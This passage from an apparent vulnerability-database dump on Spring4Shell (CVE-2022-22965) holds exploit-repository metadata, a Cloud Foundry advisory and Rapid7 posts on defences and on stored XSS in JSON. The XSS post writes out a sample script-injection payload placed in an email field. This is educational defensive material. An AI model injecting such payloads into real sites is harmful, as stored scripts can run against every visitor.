"3DB87825-2C58-5ABC-8BA3-E1CB80AFB11E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-11T17:49:19", "description": "# CVE-2022-22965 (Spring4Shell) Proof of Concept\n\n\n\nJust playin...", "cvss3": 
{"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-07T09:13:11", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-07T09:21:07", "id": "679F3E9E-1555-5391-86FF-CD3D67D80BDD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-13T04:10:51", "description": "# Spring4Shell-CVE-2022-22965.py\nScript to check for Spring4Shel...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-09T08:40:49", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": 
"HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-13T03:32:59", "id": "F09161EA-B10D-5DBF-B548-6F9BE7EE20B2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T15:14:28", "description": "# S\u00e5rbarheter i Spring Framework - CVE-2022-22965\r\n\r\n## Liste ov...", "cvss3": {}, "published": "2022-04-01T10:16:24", "type": "githubexploit", "title": "Exploit for CVE-2022-22965", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T10:07:48", "id": "0273F07C-E2F1-5454-85F6-6B58CCA854A3", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-04-11T17:49:45", "description": "= Spring Framework version override showcase\n\nThis repository sh...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T06:16:20", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-01T06:44:44", "id": "18E406F3-7737-558F-9993-BD12421447B4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-11T17:49:26", "description": "<h1 align=\"center\">\n <br>\n spring4shell_victim\n <br>\n <br>...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T13:35:56", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-08T22:06:28", "id": "21FA1164-A4AD-57B4-8CFE-6B9B5EE9D199", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, 
{"lastseen": "2022-05-18T22:19:56", "description": "# Spring4Shell-POC (CVE-2022-22965)\n\n via data binding.\n\n**Affected Cloud Foundry Products and Versions**\n\n_Severity is critical unless otherwise noted._\n\n * UAA Release (OSS)\n   * Versions 74.2.0 \u2013 75.17.0\n * CF Deployment\n   * Version 12.1.0 and above but below version 20.0\n\n**Mitigation**\n\nUsers of affected products are strongly encouraged to follow the mitigations below. The Cloud Foundry project recommends upgrading the following releases:\n\n * UAA Release (OSS)\n   * Upgrade affected versions to 75.18.0 or greater.\n * CF Deployment\n   * Upgrade affected versions to 20.0 or greater.\n   * Alternatively a workaround can be deployed on affected versions.\n\n**Workaround for CF Deployment**\n\n 1. Create a temporary ops file with the following content:\n\n    - type: replace\n      path: /releases/name=uaa\n      value:\n        name: uaa\n        url: https://bosh.io/d/github.com/cloudfoundry/uaa-release?v=75.18.0\n        version: \"75.18.0\"\n        sha1: 5f9c63ecf952e94ff3ce229eed25069c7ce2a6b0\n\n 2. Apply this ops-file during subsequent bosh deploys for cf-deployment, until you upgrade cf-deployment to a version where this CVE is fixed. For more information on how to apply ops-files, read the section of the README: <https://github.com/cloudfoundry/cf-deployment#ops-files>\n\n**References:**\n\n<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>\n\n**History**\n\n2022-04-05: Initial vulnerability report published. 
\n2022-04-21: Added fixed version of CF Deployment\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T00:00:00", "type": "cloudfoundry", "title": "CVE-2022-22965: UAA affected by Spring Framework RCE via Data Binding on JDK 9+ | Cloud Foundry", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T00:00:00", "id": "CFOUNDRY:D24EF96EB1845EA8878001F85C1C2C75", "href": "https://www.cloudfoundry.org/blog/cve-2022-22965-uaa-affected-by-spring-framework-rce-via-data-binding-on-jdk-9/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2022-04-08T21:29:15", "description": "\n\nThe warm weather is starting to roll in, the birds are chirping, and Spring... well, [Spring4Shell](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) is making a timely entrance. If you\u2019re still recovering from [Log4Shell](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>), we\u2019re here to tell you you're not alone. 
While discovery and research of [CVE-2022-22965](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>) is evolving, [Rapid7 is committed](<https://www.rapid7.com/blog/post/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/>) to providing our customers updates and guidance. In this blog, we wanted to share some recent product enhancements across our [application security](<https://www.rapid7.com/fundamentals/web-application-security/>) portfolio to help our customers with easy ways to test and secure their apps against Spring4Shell.\n\n## What is Spring4Shell?\n\nBefore we jump into how we can help you with our products, let's give a quick overview of Spring4Shell. CVE-2022-22965 affects Spring MVC and Spring WebFlux applications running JDK versions 9 and later. A new feature was introduced in JDK version 9 that allows access to the ClassLoader from a Class. This vulnerability can be exploited for remote code execution (RCE). If you\u2019re looking for more detailed information on Spring4Shell, check out our overview blog [here](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>).\n\n## _Updated: _RCE Attack Module for Spring4Shell\n\nCustomers leveraging [InsightAppSec](<https://www.rapid7.com/products/insightappsec/>), our dynamic application security testing (DAST) tool, can regularly assess the risk of their applications. InsightAppSec allows you to configure 100+ types of web attacks to simulate real-world exploitation attempts. While it may be April 1st, we\u2019re not foolin\u2019 around when it comes to our excitement in sharing [this update](<https://docs.rapid7.com/release-notes/insightappsec/20220401/>) to our RCE Attack Module that we\u2019ve included in the default All Modules Attack Template \u2013 specifically testing for Spring4Shell. 
\n\nCloud customers who already have the [All Modules Attack Template](<https://docs.rapid7.com/insightappsec/attack-templates>) enabled will automatically benefit from this new RCE attack as part of their regular scan cadence. As of April 4th, customers with [on-prem scan engines](<https://docs.rapid7.com/release-notes/appspider/20220404/>) can also benefit from this updated RCE attack module. For those customers with on-premises engines, make sure to have auto-upgrades turned on to automatically benefit from this updated Attack Module, or update manually to the latest scan engine. \n\n\n\n\n## _NEW:_ Block against Spring4Shell attacks\n\nIn addition to assessing your applications for attacks with InsightAppSec, we\u2019ve also got you covered when it comes to protecting your in-production applications. With [tCell](<https://www.rapid7.com/products/tcell/>), customers can both detect and block anomalous activity, such as Spring4Shell exploit attempts. Check out the GIF below on how to enable the recently added Spring RCE block rule in tCell.\n\n\n\n## _NEW:_ Identify vulnerable packages (such as CVE-2022-22965)\n\nA key component of Spring4Shell is detecting whether or not you have any vulnerable packages. tCell customers leveraging the [Java agent](<https://docs.rapid7.com/tcell/installing-the-java-agent-for-tomcat>) can determine if they have any vulnerable packages, including CVE-2022-22965, in their runtime environment.\n\nSimply navigate to tCell on the Insight Platform, select your application, and navigate to the [**Packages and Vulns**](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) tab. Here you can view any vulnerable packages that were detected at runtime, and follow the specified remediation guidance.\n\n\n\nCurrently, the recommended mitigation guidance is for Spring Framework users to update to the fixed versions. 
Further information on the vulnerability and ongoing guidance are being provided in [Spring\u2019s blog here](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>).\n\n## Utilize OS commands\n\nOne of the benefits of using tCell\u2019s [app server agents](<https://docs.rapid7.com/tcell/install-an-agent>) is the fact that you can enable blocking (after confirming you\u2019re not blocking any legitimate commands) for OS commands. This will prevent a wide range of exploits including Shell commands. Below you will see an example of our [**OS Commands**](<https://docs.rapid7.com/tcell/command-injection>) dashboard highlighting the execution attempts, and in the second graphic, you\u2019ll see the successfully blocked OS command events.\n\n\n\n \n\n\n\n\n## What\u2019s next?\n\nWe recommend following [Spring\u2019s latest guidance](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) on remediation to reduce risk in your applications. If you\u2019re looking for more information at any time, we will continue to update both this blog, and our [initial response blog to Spring4Shell](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>). Additionally, you can always reach out to your customer success manager, support resources, or anyone on your Rapid7 account team. 
Happy April \u2013 and here\u2019s to hoping the only shells you deal with in the future are those found on the beach!\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T22:26:36", "type": "rapid7blog", "title": "Securing Your Applications Against Spring4Shell (CVE-2022-22965)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-01T22:26:36", "id": "RAPID7BLOG:3CB617802DB281BCA8BA6057AE3A98E0", "href": "https://blog.rapid7.com/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-04T16:01:21", "description": "\n\nI recently wrote a blog post on [injection-type vulnerabilities](<http://rapid7.com/blog/post/2021/10/19/owasp-top-10-deep-dive-injection-and-stack-traces-from-a-hackers-perspective/>) and how they were knocked down a few spots from 1 to 3 on the new [OWASP Top 10 for 
2022](<https://www.rapid7.com/blog/post/2021/09/30/the-2021-owasp-top-10-have-evolved-heres-what-you-should-know/>). The main focus of that article was to demonstrate how stack traces could be \u2014 and still are \u2014 used via injection attacks to gather information about an application to further an attacker's goal. In that post, I skimmed over one of my all time favorite types of injections: [cross-site scripting (XSS)](<https://www.rapid7.com/fundamentals/cross-site-scripting/>).\n\nIn this post, I\u2019ll cover this gem of an exploit in much more depth, highlighting how it has managed to adapt to the newer environments of today\u2019s modern web applications, specifically the API and Javascript Object Notation (JSON).\n\nI know the term API is thrown around a lot when referencing web applications these days, but for this post, I will specifically be referencing requests made from the front end of a web application to the back end via ajax (Asynchronous JavaScript and XML) or more modern approaches like the fetch method in JavaScript.\n\nBefore we begin, I'd like to give a quick recap of what XSS is and how a legacy application might handle these types of requests that could trigger XSS, then dive into how XSS still thrives today in modern web applications via the methods mentioned so far.\n\n## What is cross-site scripting?\n\nThere are many types of XSS, but for this post, I\u2019ll only be focusing on persistent XSS, which is sometimes referred to as stored XSS.\n\nXSS is a type of injection attack, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to execute malicious code \u2014 generally in the form of a browser-side script like JavaScript, for example \u2014 against an unsuspecting end user. 
Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application accepts an input from a user without sanitizing, validating, escaping, or encoding it.\n\nBecause the end user\u2019s browser has no way to know not to trust the malicious script, the browser will execute the script. Because of this broken trust, attackers typically leverage these vulnerabilities to steal victims\u2019 cookies, session tokens, or other sensitive information retained by the browser. They could also redirect to other malicious sites, install keyloggers or crypto miners, or even change the content of the website.\n\nNow for the \"stored\" part. As the name implies, stored XSS generally occurs when the malicious payload has been stored on the target server, usually in a database, from input that has been submitted in a message forum, visitor log, comment field, form, or any parameter that lacks proper input sanitization.\n\nWhat makes this type of XSS so much more damaging is that, unlike reflected XSS \u2013 which only affects specific targets via cleverly crafted links \u2013 stored XSS affects any and everyone visiting the compromised site. This is because the XSS has been stored in the applications database, allowing for a much larger attack surface.\n\n## Old-school apps\n\nNow that we\u2019ve established a basic understanding of stored XSS, let's go back in time a few decades to when web apps were much simpler in their communications between the front-end and back-end counterparts.\n\nLet's say you want to change some personal information on a website, like your email address on a contacts page. When you enter in your email address and click the update button, it triggers the POST method to send the form data to the back end to update that value in a database. The database updates the value in a table, then pushes a response back to the web applications front end, or UI, for you to see. 
This would usually result in the entire page having to reload to display only a very minimal amount of change in content, and while it\u2019s very inefficient, nonetheless the information would be added and updated for the end user to consume.\n\nIn the example below, clicking the update button submits a POST form request to the back-end database where the application updates and stores all the values, then provides a response back to the webpage with the updated info.\n\n\n\n\n\n## Old-school XSS\n\nAs mentioned in my previous blog post on injection, I give an example where an attacker enters in a payload of <script>alert(\u201cThis is XSS\u201d)</script> instead of their email address and clicks the update button. Again, this triggers the POST method to take our payload and send it to the back-end database to update the email table, then pushes a response back to the front end, which gets rendered back to the UI in HTML. However, this time the email value being stored and displayed is my XSS payload, <script>alert(\u201cThis is XSS\u201d)</script>, not an actual email address.\n\n\n\nAs seen above, clicking the \u201cupdate\u201d button submits the POST form data to the back end where the database stores the values, then pushes back a response to update the UI as HTML.\n\n\n\nHowever, because our payload is not being sanitized properly, our malicious JavaScript gets executed by the browser, which causes our alert box to pop up as seen below.\n\n\n\nWhile the payload used in the above example is harmless, the point to drive home here is that we were able to get the web application to store and execute our JavaScript all through a simple contact form. Anyone visiting my contact page will see this alert pop up because my XSS payload has been stored in the database and gets executed every time the page loads. 
From this point on, the possible damage that could be done here is endless and only limited by the attacker\u2019s imagination\u2026 well, and their coding skills. \n\n## New-school apps\n\nIn the first example I gave, when you updated the email address on the contact page and the request was fulfilled by the backend, the entire page would reload in order to display the newly created or updated information. You can see how inefficient this is, especially if the only thing changing on the page is a single line or a few lines of text. Here is where ajax and/or the fetch method comes in.\n\n[Ajax, or the fetch method](<https://www.w3schools.com/whatis/whatis_ajax.asp>), can be used to get data from or post data to a remote source, then update the front-end UI of that web application without having to refresh the page. Only the content from the specific request is updated, not the entire page, and that is the key difference between our first example and this one.\n\nAnd a very popular format for said data being sent and received is JavaScript Object Notation, most commonly known as JSON. (Don't worry, I\u2019ll get back to those curly braces in just a bit.) \n\n## New-school XSS\n\n_(Well, not really, but it sounds cool.)_\n\nNow, let's pretend we\u2019ve traveled back to the future and our contact page has been rewritten to use ajax or the fetch method to send and receive data to and from the database. From the user's point of view, nothing has changed \u2014 still the same ol\u2019 form. But this time, when the email address is being updated, only the contact form refreshes. The entire page and all of its contents do not refresh like in the previous version, which is a major win for efficiency and user experience. \n\nBelow is an example of what a POST might look like formatted in JSON.\n\n\n\n\u201cWhat is JSON?\u201d you might ask. 
Short for JavaScript Object Notation, it is a lightweight text format for storing and transferring data and is most commonly used when sending data to and from servers. Remember those curly braces I mentioned earlier? Well, one quick and easy way to spot JSON is the formatting and the use of curly braces.\n\nIn the example above, you can see what our new POST looks like using ajax or the fetch method in JavaScript. While the end result is no different than before, as seen in the example below, the method that was used to update the page is quite different. The key difference here is that the data we\u2019re wanting to update is being treated as just that: data, but in the form of JSON as opposed to HTML.\n\n\n\nNow, let's inject the same XSS payload into the same email field and hit update. In the example below, you can see that our POST request has been wrapped in curly braces, using JSON, and is formatted a bit differently than previously before being sent to the back end to be processed.\n\n\n\n\n\nIn the example above, you can see that the application is allowing my email address to be the XSS payload in its entirety. However, the JavaScript here is only being displayed and not being executed as code by the browser, so the alert \u201cpop\u201d message never gets triggered as in the previous example. That again is the key difference from the original way we were fulfilling the requests versus our new, more modern way \u2014 or in short, using JSON instead of HTML.\n\nNow you might be asking yourself, what's wrong with allowing the XSS payload to be the email address if it's only being displayed and not being executed as JavaScript by the browser. 
That is a valid question, but hear me out.\n\nSee, I've been working in this industry long enough to know that the two most common responses to a question or statement regarding cybersecurity begin with either \u201cthat depends\u2026\u201d or \u201cwhat if\u2026\u201d I'm going to go with the latter here and throw a couple what-ifs at you.\n\nNow that my XSS is stored in your database, it\u2019s only a matter of time before this ticking time bomb goes off. Just because my XSS is being treated as JSON and not HTML now does not mean that will always be the case, and attackers are betting on this.\n\nHere are a few scenarios.\n\n### Scenario 1\n\nWhat if team B handles this data differently from team A? What if team B still uses more traditional methods of sending and receiving data to and from the back end and does leverage the use of HTML and not JSON? \n\nIn that case, the XSS would most likely eventually get executed. It might not affect the website that the XSS was originally injected into, but the stored data can be (and usually is) also used elsewhere. The XSS stored in that database is probably going to be shared and used by multiple other teams and applications at some point. The odds of all those different teams leveraging the exact same standards and best practices are slim to none, and attackers know this. \n\n### Scenario 2\n\nWhat if, down the road, a developer using more modern techniques like ajax or the fetch method to send and receive data to and from the back end decides to use the .innerHTML property instead of .innerTEXT to load that JSON into the UI? 
All bets are off, and the stored XSS that was previously being protected by those lovely curly braces will now most likely get executed by the browser.\n\n### Scenario 3\n\nLastly, what if the current app had been developed to use server-side rendering, but a decision from higher up has been made that some costs need to be cut and that the company could actually save money by recoding some of their web apps to be client-side rather than server-side? \n\nPreviously, the back end was doing all the work, including sanitizing all user input, but now the shift will be for the browser to do all the heavy lifting. Good luck spotting all the XSS stored in the DB \u2014 in its previous state, it was \u201charmless,\u201d but now it could get rendered to the UI as HTML, allowing the browser to execute said stored XSS. In this scenario, a decision that was made upstream will have an unexpected security impact downstream, both figuratively and literally \u2014 a situation that is all too well-known these days.\n\n## Final thoughts\n\nPart of my job as a security advisor is to, well, advise. And it's these types of situations that keep me up at night. I come across XSS in applications every day, and while I may not see as many fun and exciting \u201cpops\u201d as in years past, I see something a bit more troubling. \n\nThis type of XSS is what I like to call a \u201csleeper vuln\u201d \u2013 laying dormant, waiting for the right opportunity to be woken up. If I didn't know any better, I'd say XSS has evolved and is aware of its new surroundings. Of course, XSS hasn\u2019t evolved, but the applications in which it lives have. 
\n\nAt the end of the day, we\u2019re still talking about the same XSS from its conception, the same XSS that has been on the [OWASP Top 10](<https://www.rapid7.com/blog/post/2021/09/30/the-2021-owasp-top-10-have-evolved-heres-what-you-should-know/>) for decades \u2014 what we\u2019re really concerned about is the lack of sanitization or handling of user input. But now, with the massive adoption of JavaScript frameworks like Angular, libraries like React, the use of APIs, and the heavy reliance on them to handle the data properly, we\u2019ve become complacent in our duties to harden applications the proper way.\n\nThere seems to be a division in camps around XSS in JSON. On the one hand, some feel that since the JavaScript isn't being executed by the browser, everything is fine. Who cares if an email address (or any data for that matter) is potentially dangerous \u2014 _**as long as**_ it's not being executed by the browser. And on the other hand, you have the more fundamentalist, dare I say philosophical thought that all user input should never be trusted: It should always be sanitized, regardless of whether it\u2019s treated as data or not \u2014 and not solely because of following best coding and security practices, but also because of the \u201cthat depends\u201d and \u201cwhat if\u201d scenarios in the world. \n\nI'd like to point out in my previous statement above, that \u201c_**as long as**_\u201d is vastly different from _**\u201c**cannot._\u201d \u201cAs long as\u201d implies situational awareness and that a certain set of criteria need to be met for it to be true or false, while \u201ccannot\u201d is definite and fixed, regardless of the situation or criteria. \u201cAs long as the XSS is wrapped in curly braces\u201d means it does not pose a risk in its current state but could in other states. 
But if input is sanitized and escaped properly, the XSS would never exist in the first place, and thus it \u201ccannot\u201d or could not be executed by the browser, ever.\n\nI guess I cannot really complain too much about these differences of opinions though. The fact that I'm even having these conversations with others is already a step in the right direction. But what does concern me is that it's 2022, and we\u2019re still seeing XSS rampant in applications, but because it's wrapped in JSON somehow makes it acceptable. One of the core fundamentals of my job is to find and prioritize risk, then report. And while there is always room for discussion around the severity of these types of situations, lots of factors have to be taken into consideration, a spade isn't always a spade in [application security](<https://www.rapid7.com/fundamentals/web-application-security/>), or cybersecurity in general for that matter. But you can rest assured if I find XSS in JSON in your environment, I will be calling it out. \n\nI hope there will be a future where I can look back and say, \u201cRemember that one time when curly braces were all that prevented your website from getting hacked?\u201d Until then, JSON or not, never trust user data, and sanitize all user input (and output for that matter). 
A mere { } should never be the difference between your site getting hacked or not.\n\n_**Additional reading:**_\n\n * _[Cloud-Native Application Protection (CNAPP): What's Behind the Hype?](<https://www.rapid7.com/blog/post/2022/05/02/cloud-native-application-protection-cnapp-whats-behind-the-hype/>)_\n * _[Rapid7 Named a Visionary in 2022 Magic Quadrant\u2122 for Application Security Testing Second Year in a Row](<https://www.rapid7.com/blog/post/2022/04/21/rapid7-named-a-visionary-in-2022-magic-quadrant-for-application-security-testing-second-year-in-a-row/>)_\n * _[Let's Dance: InsightAppSec and tCell Bring New DevSecOps Improvements in Q1](<https://www.rapid7.com/blog/post/2022/04/15/lets-dance-insightappsec-and-tcell-bring-new-devsecops-improvements-in-q1/>)_\n * _[Securing Your Applications Against Spring4Shell (CVE-2022-22965)](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>)_\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-04T15:48:03", "type": "rapid7blog", "title": "XSS in JSON: Old-School Attacks for Modern Applications", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-04T15:48:03", "id": "RAPID7BLOG:07EA4EC150B77E4EB3557E1B1BA39725", "href": "https://blog.rapid7.com/2022/05/04/xss-in-json-old-school-attacks-for-modern-applications/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-15T15:31:14", "description": "> _To the left, to the left, to the right, right \u2014 the CI/CD Pipeline is on the move._\n\n\n\nDevSecOps is all about adding security across the application lifecycle. A popular approach to application security is to [shift left](<https://www.rapid7.com/blog/post/2021/09/27/to-the-left-your-guide-to-infrastructure-as-code-for-shifting-left/>), which means moving security earlier in the [software development lifecycle (SDLC)](<https://www.rapid7.com/fundamentals/software-development-life-cycle-sdlc/>). This makes sense: If you find a critical security bug in production, it costs a lot more to resolve it than if you found it in development.\n\nIn Q1 2022, we've continued to invest in improvements to [InsightAppSec](<https://www.rapid7.com/products/insightappsec/>) and [tCell](<https://www.rapid7.com/products/tcell/>) that help organizations shift left and automate security testing prior to production deployment. And at the same time, we've made other enhancements to make your life easier. Oh\u2026 and we added new attacks and blocking rules for [Spring4Shell](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>).\n\n## Shifting app security testing left in the CI/CD pipeline\n\nYour development teams are innovating and releasing features and new experiences faster than ever before. Manual testing can no longer keep up with the speed of innovation. 
